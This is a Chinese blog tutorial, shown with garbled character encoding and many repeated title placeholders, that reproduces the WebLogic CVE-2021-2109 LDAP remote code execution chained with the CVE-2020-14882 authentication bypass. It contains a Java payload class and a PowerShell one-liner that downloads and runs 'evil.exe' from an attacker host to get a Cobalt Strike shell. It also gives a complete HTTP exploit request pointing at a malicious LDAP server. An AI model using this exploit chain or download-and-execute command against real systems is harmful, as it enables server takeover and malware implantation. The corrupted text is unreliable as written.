溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶(hù)服務(wù)條款》

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

發(fā)布時(shí)間:2021-12-13 09:36:25 來(lái)源:億速云 閱讀:603 作者:柒染 欄目:網(wǎng)絡(luò)管理

本篇文章給大家分享的是有關(guān)weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的,小編覺(jué)得挺實(shí)用的,因此分享給大家學(xué)習(xí),希望大家閱讀完這篇文章后可以有所收獲,話(huà)不多說(shuō),跟著小編一起來(lái)看看吧。

環(huán)境搭建

參考:

https://blog.csdn.net/zhlh_xt/article/details/76436807

下載鏈接:

https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html

https://www.oracle.com/java/technologies/javase/javase7-archive-downloads.html

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

開(kāi)始安裝:

| Java -D64 -jar wls1036_generic.jar |
weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

| C:\Oracle\Middleware\user_projects\domains |
設(shè)置密碼

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

搭建完畢

訪(fǎng)問(wèn)目標(biāo):

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

漏洞復(fù)現(xiàn)

準(zhǔn)備工作:

ldap包下載 https://github.com/RandomRobbieBF/marshalsec-jar/archive/master.zip
構(gòu)造java包進(jìn)行編譯:Request.java

| import java.io.BufferedReader;

import java.io.InputStream;

import java.io.InputStreamReader;
public class Request{

public Request() throws Exception {

Process p = Runtime.getRuntime().exec(new String[]{"cmd","/c","calc.exe"});

InputStream is = p.getInputStream();

BufferedReader reader = new BufferedReader(new InputStreamReader(is));

String line;

while((line = reader.readLine()) != null) {

System.out.println(line);

}


p.waitFor();

is.close();

reader.close();

p.destroy();

}

} |

如想上線(xiàn)CS把calc.exe修改為下載cs木馬并執(zhí)行命令

cd ../../Windows/Temp && powershell (new-object System.Net.WebClient).DownloadFile('http://vps/123.jpg','evil.exe') & evil.exe

進(jìn)行編譯:注意目標(biāo)環(huán)境是什么jdk就用什么jdk版本進(jìn)行編譯

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

編譯好class包后上傳到vps

開(kāi)啟http服務(wù),下面放編譯好的class包

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

用下載好的marshalsec包開(kāi)啟ldap服務(wù):

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

通過(guò)burp請(qǐng)求:配合
CVE-2021-2109(ldap遠(yuǎn)程代碼執(zhí)行)和CVE-2020-14882(未授權(quán)訪(fǎng)問(wèn))

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

完整數(shù)據(jù)包:

| POST /console/css/%252e%252e%252f/consolejndi.portal HTTP/1.1

Host: 192.168.48.203:7001

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4230.1 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

X-Forwarded-For: 127.0.0.2

Content-Length: 163

Content-Type: application/x-www-form-urlencoded

_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22;ldap://vps:5005/Request;AdminServer%22) |

cs接收shell

weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的

限制條件:目標(biāo)可以出網(wǎng),能夠成功構(gòu)造和發(fā)送包

以上就是weblogic CVE-2021-2109ldap遠(yuǎn)程代碼執(zhí)行漏洞的復(fù)現(xiàn)是怎樣的,小編相信有部分知識(shí)點(diǎn)可能是我們?nèi)粘9ぷ鲿?huì)見(jiàn)到或用到的。希望你能通過(guò)這篇文章學(xué)到更多知識(shí)。更多詳情敬請(qǐng)關(guān)注億速云行業(yè)資訊頻道。

向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI